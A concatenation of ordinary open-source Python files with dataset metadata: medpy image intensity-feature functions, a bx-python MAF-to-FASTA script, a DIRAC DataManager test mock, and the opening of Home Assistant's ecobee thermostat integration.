@param dim the dimension or dimensions along which to cut the image into sub-volumes
@type dim int | sequence of ints
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the distance of each voxel to the images center
@type ndarray
@raises ArgumentError if a invalid dim index of number of dim indices were supplied
"""
# pre-process arguments
if type(image) == tuple or type(image) == list:
image = image[0]
if type(dim) is int:
dims = [dim]
else:
dims = list(dim)
# check arguments
if len(dims) >= image.ndim - 1:
raise ArgumentError('Applying a sub-volume extraction of depth {} on a image of dimensionality {} would lead to invalid images of dimensionality <= 1.'.format(len(dims), image.ndim))
for dim in dims:
if dim >= image.ndim:
raise ArgumentError('Invalid dimension index {} supplied for image(s) of shape {}.'.format(dim, image.shape))
# extract desired sub-volume
slicer = [slice(None)] * image.ndim
for dim in dims: slicer[dim] = slice(1)
subvolume = numpy.squeeze(image[slicer])
# compute centerdistance for sub-volume and reshape to original sub-volume shape (note that normalization and mask are not passed on in this step)
o = centerdistance(subvolume, voxelspacing).reshape(subvolume.shape)
# re-establish original shape by copying the resulting array multiple times
for dim in sorted(dims):
o = numpy.asarray([o] * image.shape[dim])
o = numpy.rollaxis(o, 0, dim + 1)
# extract intensities / centerdistance values, applying normalization and mask in this step
return intensities(o, mask)
def indices(image, voxelspacing = None, mask = slice(None)):
"""
Takes an image and returns the voxels ndim-indices as voxel-wise feature. The voxel
spacing is taken into account, i.e. the indices are not array indices, but millimeter
indices.
This is a multi-element feature where each element corresponds to one of the images
axes, e.g. x, y, z, ...
Note that this feature is independent of the actual image content, but depends
solely on its shape. Therefore always a one-dimensional feature is returned, even if
a multi-spectral image has been supplied.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return each voxel ndim-index
@type ndarray
"""
if type(image) == tuple or type(image) == list:
image = image[0]
if not type(mask) is slice:
mask = numpy.array(mask, copy=False, dtype=numpy.bool)
if voxelspacing is None:
voxelspacing = [1.] * image.ndim
return join(*map(lambda (a, vs): a[mask].ravel() * vs, zip(numpy.indices(image.shape), voxelspacing)))
def local_mean_gauss(image, sigma = 5, voxelspacing = None, mask = slice(None)):
"""
Takes a simple or multi-spectral image and returns the approximate mean over a small
region around each voxel. A multi-spectral image must be supplied as a list or tuple
of its spectra.
Optionally a binary mask can be supplied to select the voxels for which the feature
should be extracted.
For this feature a Gaussian smoothing filter is applied to the image / each spectrum
and then the resulting intensity values returned.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param sigma Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
@type sigma scalar or sequence of scalars
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the images intensities
@type ndarray
"""
return __extract_feature(__extract_local_mean_gauss, image, mask, sigma = sigma, voxelspacing = voxelspacing)
def guassian_gradient_magnitude(image, sigma = 5, voxelspacing = None, mask = slice(None)):
"""
Computes the gradient magnitude (edge-detection) of the supplied image using gaussian
derivates and returns the intensity values.
Optionally a binary mask can be supplied to select the voxels for which the feature
should be extracted.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param sigma Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
@type sigma scalar or sequence of scalars
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the images intensities
@type ndarray
"""
return __extract_feature(__extract_guassian_gradient_magnitude, image, mask, sigma = sigma, voxelspacing = voxelspacing)
def median(image, size = 5, voxelspacing = None, mask = slice(None)):
"""
Computes the multi-dimensional median filter and returns the resulting values per
voxel.
Optionally a binary mask can be supplied to select the voxels for which the feature
should be extracted.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param size Size of the structuring element. Can be given given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
@type size scalar or sequence of scalars
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the images intensities
@type ndarray
"""
return __extract_feature(__extract_median, image, mask, size = size, voxelspacing = voxelspacing)
def local_histogram(image, bins=19, rang="image", cutoffp=(0.0, 100.0), size=None, footprint=None, output=None, mode="ignore", origin=0, mask=slice(None)):
"""
Computes multi-dimensional histograms over a region around each voxel.
Supply an image and (optionally) a mask and get the local histogram of local
neighbourhoods around each voxel. These neighbourhoods are cubic with a sidelength of
size in voxels or, when a shape instead of an integer is passed to size, of this
shape.
If not argument is passed to output, the returned array will be of dtype float.
Voxels along the image border are treated as defined by mode. The possible values are
the same as for scipy.ndimage filter without the ''constant'' mode. Instead "ignore"
is the default and additional mode, which sets that the area outside of the image are
ignored when computing the histogram.
When a mask is supplied, the local histogram is extracted only for the voxels where
the mask is True. But voxels from outside the mask can be incorporated in the
compuation of the histograms.
The range of the histograms can be set via the rang argument. The 'image' keyword can
be supplied, to use the same range for all local histograms, extracted from the images
max and min intensity values. Alternatively, an own range can be supplied in the form
of a tuple of two numbers. Values outside the range of the histogram are ignored.
Setting a proper range is important, as all voxels that lie outside of the range are
ignored i.e. do not contribute to the histograms as if they would not exists. Some
of the local histograms can therefore be constructed from less than the expected
number of voxels.
Taking the histogram range from the whole image is sensitive to outliers. Supplying
percentile values to the cutoffp argument, these can be filtered out when computing
the range. This keyword is ignored if rang is not set to 'image'.
Setting the rang to None causes local ranges to be used i.e. the ranges of the
histograms are computed only over the local area covered by them and are hence
not comparable. This behaviour should normally not be taken.
The local histograms are normalized by dividing them through the number of elements
in the bins.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param bins the number of histogram bins
@type bins integer
@param rang the range of the histograms, can be supplied manually, set to 'image' or
set to None to use local ranges
@type rang string | tuple of numbers | None
@param cutoffp the cut-off percentiles to exclude outliers, only processed if rang is
set to 'image'
@type cutoffp tuple of scalars | 'image'
@param size See footprint, below
@type size scalar | tuple
@param footprint Either ``size`` or ``footprint`` must be defined. ``size`` gives the shape that is taken from the input array, at every element position, to define the input to the filter function. ``footprint`` is a boolean array that specifies (implicitly) a shape, but also which of the elements within this shape will get passed to the filter function. Thus ``size=(n,m)`` is equivalent to ``footprint=np.ones((n,m))``. We adjust ``size`` to the number of dimensions of the input array, so that, if the input array is shape (10,10,10), and ``size`` is 2, then the actual size used is (2,2,2).
@type footprint ndarray
@param output The ``output`` parameter passes an array in which to store the filter output.
@type output ndarray | dtype
@param mode The ``mode`` parameter determines how the array borders are handled. Default is 'ignore'
@type mode 'reflect' | 'ignore' | 'nearest' | 'mirror' | 'wrap'
@param origin The ``origin`` parameter controls the placement of the filter. Default 0.
@type origin scalar
@param mask a binary mask for the image
@type mask ndarray
@return the bin values of the local histograms for each voxel
@rtype ndarray
"""
return __extract_feature(__extract_local_histogram, image, mask, bins=bins, rang=rang, cutoffp=cutoffp, size=size, footprint=footprint, output=output, mode=mode, origin=origin)
def hemispheric_difference(image, sigma_active = 7, sigma_reference = 7, cut_plane = 0, voxelspacing = None, mask = slice(None)):
"""
Computes the hemispheric intensity difference between the brain hemispheres of an brain image.
Cuts the image along the middle of the supplied cut-plane. This results in two
images, each containing one of the brains hemispheres.
For each of these two, the following steps are applied:
1. One image is marked as active image
2. The other hemisphere image is marked as reference image
3. The reference image is fliped along the cut_plane
4. A gaussian smoothing is applied to the active image with the supplied sigma
5. A gaussian smoothing is applied to the reference image with the supplied sigma
6. The reference image is substracted from the active image, resulting in the
difference image for the active hemisphere
Finally, the two resulting difference images are stitched back together, forming a
hemispheric difference image of the same size as the original.
Note that the supplied gaussian kernel sizes (sigmas) are sensitive to the images
voxel spacing.
Note: if the number of slices along the cut-plane is odd, the central slice is
interpolated from the two hemisphere difference images when stitching them back
together.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param sigma_active Standard deviation for Gaussian kernel of the active image. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
@type sigma_active scalar or sequence of scalars
@param sigma_reference Standard deviation for Gaussian kernel of the reference image. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
@type sigma_reference scalar or sequence of scalars
@param cut_plane The axes along which to cut. This is usually the coronal plane.
@type cut_plane int
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the bin values of the local histograms for each voxel
@rtype ndarray
@raise ArgumentError If the supplied cut-plane dimension is invalid.
"""
return __extract_feature(__extract_hemispheric_difference, image, mask, sigma_active = sigma_active, sigma_reference = sigma_reference, cut_plane = cut_plane, voxelspacing = voxelspacing)
def __extract_hemispheric_difference(image, mask = slice(None), sigma_active = 7, sigma_reference = 7, cut_plane = 0, voxelspacing = None):
"""
Internal, single-image version of @see hemispheric_difference
"""
# constants
INTERPOLATION_RANGE = int(10) # how many neighbouring values to take into account when interpolating the medial longitudinal fissure slice
# check arguments
if cut_plane >= image.ndim:
raise ArgumentError('The suppliedc cut-plane ({}) is invalid, the image has only {} dimensions.'.format(cut_plane, image.ndim))
# set voxel spacing
if voxelspacing is None:
voxelspacing = [1.] * image.ndim
# compute the (presumed) location of the medial longitudinal fissure, treating also the special of an odd number of slices, in which case a cut into two equal halves is not possible
medial_longitudinal_fissure = int(image.shape[cut_plane] / 2)
medial_longitudinal_fissure_excluded = image.shape[cut_plane] % 2
# split the head into a dexter and sinister half along the saggital plane
# this is assumed to be consistent with a cut of the brain along the medial longitudinal fissure, thus separating it into its hemispheres
slicer = [slice(None)] * image.ndim
slicer[cut_plane] = slice(None, medial_longitudinal_fissure)
left_hemisphere = image[slicer]
slicer[cut_plane] = slice(medial_longitudinal_fissure + medial_longitudinal_fissure_excluded, None)
right_hemisphere = image[slicer]
# flip right hemisphere image along cut plane
slicer[cut_plane] = slice(None, None, -1)
right_hemisphere = right_hemisphere[slicer]
# substract once left from right and once right from left hemisphere, including smoothing steps
right_hemisphere_difference = __substract_hemispheres(right_hemisphere, left_hemisphere, sigma_active, sigma_reference, voxelspacing)
left_hemisphere_difference = __substract_hemispheres(left_hemisphere, right_hemisphere, sigma_active, sigma_reference, voxelspacing)
# re-flip right hemisphere image to original orientation
right_hemisphere_difference = right_hemisphere_difference[slicer]
# estimate the medial longitudinal fissure if required
if 1 == medial_longitudinal_fissure_excluded:
left_slicer = [slice(None)] * image.ndim
right_slicer = [slice(None)] * image.ndim
left_slicer[cut_plane] = slice(-1 * INTERPOLATION_RANGE, None)
right_slicer[cut_plane] = slice(None, INTERPOLATION_RANGE)
interp_data_left = left_hemisphere_difference[left_slicer]
interp_data_right = right_hemisphere_difference[right_slicer]
interp_indices_left = range(-1 * interp_data_left.shape[cut_plane], 0)
interp_indices_right = range(1, interp_data_right.shape[cut_plane] + 1)
interp_data = numpy.concatenate((left_hemisphere_difference[left_slicer], right_hemisphere_difference[right_slicer]), cut_plane)
interp_indices = numpy.concatenate((interp_indices_left, interp_indices_right), 0)
medial_longitudinal_fissure_estimated = interp1d(interp_indices, interp_data, kind='cubic', axis=cut_plane)(0)
# add singleton dimension
slicer[cut_plane] = numpy.newaxis
medial_longitudinal_fissure_estimated = medial_longitudinal_fissure_estimated[slicer]
# stich images back together
if 1 == medial_longitudinal_fissure_excluded:
hemisphere_difference = numpy.concatenate((left_hemisphere_difference, medial_longitudinal_fissure_estimated, right_hemisphere_difference), cut_plane)
else:
hemisphere_difference = numpy.concatenate((left_hemisphere_difference, right_hemisphere_difference), cut_plane)
# extract intensities and return
return __extract_intensities(hemisphere_difference, mask)
def __extract_local_histogram(image, mask=slice(None), bins=19, rang="image", cutoffp=(0.0, 100.0), size=None, footprint=None, output=None, mode="ignore", origin=0):
"""
Internal, single-image version of @see local_histogram
Note: Values outside of the histograms range are not considered.
Note: Mode constant is not available, instead a mode "ignore" is provided.
Note: Default dtype of returned values is float.
"""
if "constant" == mode:
raise RuntimeError('boundary mode not supported')
elif "ignore" == mode:
mode = "constant"
if 'image' == rang:
rang = tuple(numpy.percentile(image[mask], cutoffp))
elif not 2 == len(rang):
raise RuntimeError('the rang must contain exactly two elements or the string "image"')
_, bin_edges = numpy.histogram([], bins=bins, range=rang)
output, _ = _get_output(numpy.float if None == output else output, image, shape = [bins] + list(image.shape))
# threshold the image into the histogram bins represented by the output images first dimension, treat last bin separately, since upper border is inclusive
for i in range(bins - 1):
output[i] = (image >= bin_edges[i]) & (image < bin_edges[i + 1])
output[-1] = (image >= bin_edges[-2]) & (image <= bin_edges[-1])
# apply the sum filter to each dimension, then normalize by dividing through the sum of elements in the bins of each histogram
for i in range(bins):
output[i] = sum_filter(output[i], size=size, footprint=footprint, output=None, mode=mode, cval=0.0, origin=origin)
divident = numpy.sum(output, 0)
divident[0 == divident] = 1
output /= divident
# Notes on modes:
# mode=constant with a cval outside histogram range for the histogram equals a mode=constant with a cval = 0 for the sum_filter
# mode=constant with a cval inside histogram range for the histogram has no equal for the sum_filter (and does not make much sense)
# mode=X for the histogram equals mode=X for the sum_filter
# treat as multi-spectral image which intensities to extracted
return __extract_feature(__extract_intensities, [h for h in output], mask)
def __extract_median(image, mask = slice(None), size = 1, voxelspacing = None):
"""
Internal, single-image version of @see median
"""
# set voxel spacing
if voxelspacing is None:
voxelspacing = [1.] * image.ndim
# determine structure element size in voxel units
size = __create_structure_array(size, voxelspacing)
return __extract_intensities(median_filter(image, size), mask)
def __extract_guassian_gradient_magnitude(image, mask = slice(None), sigma = 1, voxelspacing = None):
"""
Internal, single-image version of @see guassian_gradient_magnitude
"""
# set voxel spacing
if voxelspacing is None:
voxelspacing = [1.] * image.ndim
# determine gaussian kernel size in voxel units
sigma = __create_structure_array(sigma, voxelspacing)
return __extract_intensities(gaussian_gradient_magnitude(image, sigma), mask)
def __extract_local_mean_gauss(image, mask = slice(None), sigma = 1, voxelspacing = None):
"""
Internal, single-image version of @see local_mean_gauss
"""
# set voxel spacing
if voxelspacing is None:
voxelspacing = [1.] * image.ndim
# determine gaussian kernel size in voxel units
sigma = __create_structure_array(sigma, voxelspacing)
return __extract_intensities(gaussian_filter(image, sigma), mask)
def __extract_centerdistance(image, mask = slice(None), voxelspacing = None):
"""
Internal, single-image version of @see centerdistance
"""
image = numpy.array(image, copy=False)
if None == voxelspacing:
voxelspacing = [1.] * image.ndim
# get image center and an array holding the images indices
centers = map(lambda x: (x - 1) / 2., image.shape)
indices = numpy.indices(image.shape, dtype=numpy.float)
# shift to center of image and correct spacing to real world coordinates
for dim_indices, c, vs in zip(indices, centers, voxelspacing):
dim_indices -= c
dim_indices *= vs
# compute euclidean distance to image center
return numpy.sqrt(numpy.sum(numpy.square(indices), 0))[mask].ravel()
def __extract_intensities(image, mask = slice(None)):
"""
Internal, single-image version of @see intensities
"""
return numpy.array(image, copy=True)[mask].ravel()
def __substract_hemispheres(active, reference, active_sigma, reference_sigma, voxel_spacing):
"""
Helper function for @see __extract_hemispheric_difference.
Smoothes both images and then substracts the reference from the active image.
"""
active_kernel = __create_structure_array(active_sigma, voxel_spacing)
active_smoothed = gaussian_filter(active, sigma = active_kernel)
reference_kernel = __create_structure_array(reference_sigma, voxel_spacing)
reference_smoothed = gaussian_filter(reference, sigma = reference_kernel)
return active_smoothed - reference_smoothed
def __create_structure_array(structure_array, voxelspacing):
"""
Convenient function to take a structure array (single number valid for all dimensions
or a sequence with a distinct number for each dimension) assumed to be in mm and
returns a structure array (a sequence) adapted to the image space using the supplied
voxel spacing.
"""
try:
structure_array = [s / float(vs) for s, vs in zip(structure_array, voxelspacing)]
except TypeError:
structure_array = [structure_array / float(vs) for vs in voxelspacing]
return structure_array
def __extract_feature(fun, image, mask = slice(None), **kwargs):
"""
Convenient function to cope with multi-spectral images and feature normalization.
@param fun the feature extraction function to call
@param image the single or multi-spectral image
@param mask the binary mask to select the voxels for which to extract the feature
@param kwargs additional keyword arguments to be passed to the feature extraction function
"""
if not type(mask) is slice:
mask = numpy.array(mask, copy=False, dtype=numpy.bool)
if type(image) == tuple or type(image) == list:
return utilities.join(*[fun(i, mask, **kwargs) for i in image])
else:
return fun(image, mask, **kwargs)
|
kleinfeld/medpy
|
medpy/features/intensity.py
|
Python
|
gpl-3.0
| 28,940
|
[
"Gaussian"
] |
6d0076e99c64ba0cac9f42f562ea8cf72292fff3558c603a8b31c838ccd5a84a
|
#!/galaxy/home/mgehrin/hiclib/bin/python
"""
Read a maf and print the text as a fasta file, concatenating blocks. A
specific subset of species can be chosen.
usage %prog [options] species1,species2,... < maf_file > fasta_file
--fill="expression": Insert this between blocks
--wrap=columns: Wrap FASTA to this many columns
"""
from optparse import OptionParser
import textwrap
import sys
from bx.align import maf
def __main__():
# Parse command line arguments
parser = OptionParser()
parser.add_option( "--fill", action="store", default=None, type="string", help="" )
parser.add_option( "--wrap", action="store", default=None, type="int", help="" )
parser.add_option( "--nowrap", action="store_true", default=False, dest="nowrap", help="" )
( options, args ) = parser.parse_args()
species = []
for arg in args: species.extend(arg.split(','))
fill = ""
if options.fill: fill = eval( options.fill )
wrap = 50
if (options.wrap != None): wrap = options.wrap
elif (options.nowrap): wrap = 0
# create the concatenated sequences
texts = {}
for s in species: texts[s] = []
maf_reader = maf.Reader( sys.stdin )
for m in maf_reader:
for s in species:
c = m.get_component_by_src_start( s )
if c: texts[s].append( c.text )
else: texts[s].append( "-" * m.text_size )
for s in species:
print ">" + s
print_n( fill.join( texts[s] ), wrap )
def print_n( s, n, f = sys.stdout ):
if (n <= 0):
print >> f, s
else:
p = 0
while p < len( s ):
print >> f, s[p:min(p+n,len(s))]
p += n
if __name__ == "__main__": __main__()
|
bxlab/HiFive_Paper
|
Scripts/HiCLib/bx-python-0.7.1/build/scripts-2.7/maf_to_concat_fasta.py
|
Python
|
bsd-3-clause
| 1,723
|
[
"Galaxy"
] |
47572e0ef1aa0fc96a6975b3cef008556736902044f05c4aecf803965a8b8c34
|
""" A mock of the DataManager, used for testing purposes
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
from mock import MagicMock
from DIRAC import S_OK
dm_mock = MagicMock()
dm_mock.getReplicas.return_value = S_OK({'Successful': {'/a/lfn/1.txt': {'SE1': '/a/lfn/at/SE1.1.txt',
'SE2': '/a/lfn/at/SE2.1.txt'},
'/a/lfn/2.txt': {'SE1': '/a/lfn/at/SE1.1.txt'}},
'Failed': {}})
dm_mock.getActiveReplicas.return_value = dm_mock.getReplicas.return_value
dm_mock.getReplicasForJobs.return_value = dm_mock.getReplicas.return_value
dm_mock.getCatalogFileMetadata.return_value = {'OK': True, 'Value': {'Successful': {'pippo': 'metadataPippo'},
'Failed': None}}
dm_mock.removeFile.return_value = {'OK': True, 'Value': {'Failed': False}}
dm_mock.putStorageDirectory.return_value = {'OK': True, 'Value': {'Failed': False}}
dm_mock.addCatalogFile.return_value = {'OK': True, 'Value': {'Failed': False}}
dm_mock.putAndRegister.return_value = {'OK': True, 'Value': {'Failed': False}}
dm_mock.getFile.return_value = {'OK': True, 'Value': {'Failed': False}}
|
fstagni/DIRAC
|
DataManagementSystem/Client/test/mock_DM.py
|
Python
|
gpl-3.0
| 1,323
|
[
"DIRAC"
] |
d705479dd5679d53280a06b91dd78a529d0c2a5561b4c8963f78ac54b2bc80b7
|
"""Support for Ecobee Thermostats."""
from __future__ import annotations
import collections
import voluptuous as vol
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_AUTO,
FAN_ON,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_NONE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_TENTHS,
STATE_ON,
TEMP_FAHRENHEIT,
)
from homeassistant.helpers import entity_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.util.temperature import convert
from .const import _LOGGER, DOMAIN, ECOBEE_MODEL_TO_NAME, MANUFACTURER
from .util import ecobee_date, ecobee_time
ATTR_COOL_TEMP = "cool_temp"
ATTR_END_DATE = "end_date"
ATTR_END_TIME = "end_time"
ATTR_FAN_MIN_ON_TIME = "fan_min_on_time"
ATTR_FAN_MODE = "fan_mode"
ATTR_HEAT_TEMP = "heat_temp"
ATTR_RESUME_ALL = "resume_all"
ATTR_START_DATE = "start_date"
ATTR_START_TIME = "start_time"
ATTR_VACATION_NAME = "vacation_name"
ATTR_DST_ENABLED = "dst_enabled"
ATTR_MIC_ENABLED = "mic_enabled"
ATTR_AUTO_AWAY = "auto_away"
ATTR_FOLLOW_ME = "follow_me"
DEFAULT_RESUME_ALL = False
PRESET_TEMPERATURE = "temp"
PRESET_VACATION = "vacation"
PRESET_HOLD_NEXT_TRANSITION = "next_transition"
PRESET_HOLD_INDEFINITE = "indefinite"
AWAY_MODE = "awayMode"
PRESET_HOME = "home"
PRESET_SLEEP = "sleep"
DEFAULT_MIN_HUMIDITY = 15
DEFAULT_MAX_HUMIDITY = 50
HUMIDIFIER_MANUAL_MODE = "manual"
# Order matters, because for reverse mapping we don't want to map HEAT to AUX
ECOBEE_HVAC_TO_HASS = collections.OrderedDict(
[
("heat", HVAC_MODE_HEAT),
("cool", HVAC_MODE_COOL),
("auto", HVAC_MODE_HEAT_COOL),
("off", HVAC_MODE_OFF),
("auxHeatOnly", HVAC_MODE_HEAT),
]
)
ECOBEE_HVAC_ACTION_TO_HASS = {
# Map to None if we do not know how to represent.
"heatPump": CURRENT_HVAC_HEAT,
"heatPump2": CURRENT_HVAC_HEAT,
"heatPump3": CURRENT_HVAC_HEAT,
"compCool1": CURRENT_HVAC_COOL,
"compCool2": CURRENT_HVAC_COOL,
"auxHeat1": CURRENT_HVAC_HEAT,
"auxHeat2": CURRENT_HVAC_HEAT,
"auxHeat3": CURRENT_HVAC_HEAT,
"fan": CURRENT_HVAC_FAN,
"humidifier": None,
"dehumidifier": CURRENT_HVAC_DRY,
"ventilator": CURRENT_HVAC_FAN,
"economizer": CURRENT_HVAC_FAN,
"compHotWater": None,
"auxHotWater": None,
}
PRESET_TO_ECOBEE_HOLD = {
PRESET_HOLD_NEXT_TRANSITION: "nextTransition",
PRESET_HOLD_INDEFINITE: "indefinite",
}
SERVICE_CREATE_VACATION = "create_vacation"
SERVICE_DELETE_VACATION = "delete_vacation"
SERVICE_RESUME_PROGRAM = "resume_program"
SERVICE_SET_FAN_MIN_ON_TIME = "set_fan_min_on_time"
SERVICE_SET_DST_MODE = "set_dst_mode"
SERVICE_SET_MIC_MODE = "set_mic_mode"
SERVICE_SET_OCCUPANCY_MODES = "set_occupancy_modes"
DTGROUP_INCLUSIVE_MSG = (
f"{ATTR_START_DATE}, {ATTR_START_TIME}, {ATTR_END_DATE}, "
f"and {ATTR_END_TIME} must be specified together"
)
CREATE_VACATION_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(ATTR_VACATION_NAME): vol.All(cv.string, vol.Length(max=12)),
vol.Required(ATTR_COOL_TEMP): vol.Coerce(float),
vol.Required(ATTR_HEAT_TEMP): vol.Coerce(float),
vol.Inclusive(
ATTR_START_DATE, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG
): ecobee_date,
vol.Inclusive(
ATTR_START_TIME, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG
): ecobee_time,
vol.Inclusive(ATTR_END_DATE, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG): ecobee_date,
vol.Inclusive(ATTR_END_TIME, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG): ecobee_time,
vol.Optional(ATTR_FAN_MODE, default="auto"): vol.Any("auto", "on"),
vol.Optional(ATTR_FAN_MIN_ON_TIME, default=0): vol.All(
int, vol.Range(min=0, max=60)
),
}
)
DELETE_VACATION_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(ATTR_VACATION_NAME): vol.All(cv.string, vol.Length(max=12)),
}
)
RESUME_PROGRAM_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Optional(ATTR_RESUME_ALL, default=DEFAULT_RESUME_ALL): cv.boolean,
}
)
SET_FAN_MIN_ON_TIME_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_FAN_MIN_ON_TIME): vol.Coerce(int),
}
)
SUPPORT_FLAGS = (
SUPPORT_TARGET_TEMPERATURE
| SUPPORT_PRESET_MODE
| SUPPORT_AUX_HEAT
| SUPPORT_TARGET_TEMPERATURE_RANGE
| SUPPORT_FAN_MODE
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the ecobee thermostat."""
data = hass.data[DOMAIN]
entities = []
for index in range(len(data.ecobee.thermostats)):
thermostat = data.ecobee.get_thermostat(index)
if not thermostat["modelNumber"] in ECOBEE_MODEL_TO_NAME:
_LOGGER.error(
"Model number for ecobee thermostat %s not recognized. "
"Please visit this link to open a new issue: "
"https://github.com/home-assistant/core/issues "
"and include the following information: "
"Unrecognized model number: %s",
thermostat["name"],
thermostat["modelNumber"],
)
entities.append(Thermostat(data, index, thermostat))
async_add_entities(entities, True)
platform = entity_platform.async_get_current_platform()
def create_vacation_service(service):
"""Create a vacation on the target thermostat."""
entity_id = service.data[ATTR_ENTITY_ID]
for thermostat in entities:
if thermostat.entity_id == entity_id:
thermostat.create_vacation(service.data)
thermostat.schedule_update_ha_state(True)
break
def delete_vacation_service(service):
"""Delete a vacation on the target thermostat."""
entity_id = service.data[ATTR_ENTITY_ID]
vacation_name = service.data[ATTR_VACATION_NAME]
for thermostat in entities:
if thermostat.entity_id == entity_id:
thermostat.delete_vacation(vacation_name)
thermostat.schedule_update_ha_state(True)
break
def fan_min_on_time_set_service(service):
"""Set the minimum fan on time on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
fan_min_on_time = service.data[ATTR_FAN_MIN_ON_TIME]
if entity_id:
target_thermostats = [
entity for entity in entities if entity.entity_id in entity_id
]
else:
target_thermostats = entities
for thermostat in target_thermostats:
thermostat.set_fan_min_on_time(str(fan_min_on_time))
thermostat.schedule_update_ha_state(True)
def resume_program_set_service(service):
"""Resume the program on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
resume_all = service.data.get(ATTR_RESUME_ALL)
if entity_id:
target_thermostats = [
entity for entity in entities if entity.entity_id in entity_id
]
else:
target_thermostats = entities
for thermostat in target_thermostats:
thermostat.resume_program(resume_all)
thermostat.schedule_update_ha_state(True)
hass.services.async_register(
DOMAIN,
SERVICE_CREATE_VACATION,
create_vacation_service,
schema=CREATE_VACATION_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_DELETE_VACATION,
delete_vacation_service,
schema=DELETE_VACATION_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_SET_FAN_MIN_ON_TIME,
fan_min_on_time_set_service,
schema=SET_FAN_MIN_ON_TIME_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_RESUME_PROGRAM,
resume_program_set_service,
schema=RESUME_PROGRAM_SCHEMA,
)
platform.async_register_entity_service(
SERVICE_SET_DST_MODE,
{vol.Required(ATTR_DST_ENABLED): cv.boolean},
"set_dst_mode",
)
platform.async_register_entity_service(
SERVICE_SET_MIC_MODE,
{vol.Required(ATTR_MIC_ENABLED): cv.boolean},
"set_mic_mode",
)
platform.async_register_entity_service(
SERVICE_SET_OCCUPANCY_MODES,
{
vol.Optional(ATTR_AUTO_AWAY): cv.boolean,
vol.Optional(ATTR_FOLLOW_ME): cv.boolean,
},
"set_occupancy_modes",
)
class Thermostat(ClimateEntity):
"""A thermostat class for Ecobee."""
def __init__(self, data, thermostat_index, thermostat):
"""Initialize the thermostat."""
self.data = data
self.thermostat_index = thermostat_index
self.thermostat = thermostat
self._name = self.thermostat["name"]
self.vacation = None
self._last_active_hvac_mode = HVAC_MODE_HEAT_COOL
self._operation_list = []
if (
self.thermostat["settings"]["heatStages"]
or self.thermostat["settings"]["hasHeatPump"]
):
self._operation_list.append(HVAC_MODE_HEAT)
if self.thermostat["settings"]["coolStages"]:
self._operation_list.append(HVAC_MODE_COOL)
if len(self._operation_list) == 2:
self._operation_list.insert(0, HVAC_MODE_HEAT_COOL)
self._operation_list.append(HVAC_MODE_OFF)
self._preset_modes = {
comfort["climateRef"]: comfort["name"]
for comfort in self.thermostat["program"]["climates"]
}
self._fan_modes = [FAN_AUTO, FAN_ON]
self.update_without_throttle = False
async def async_update(self):
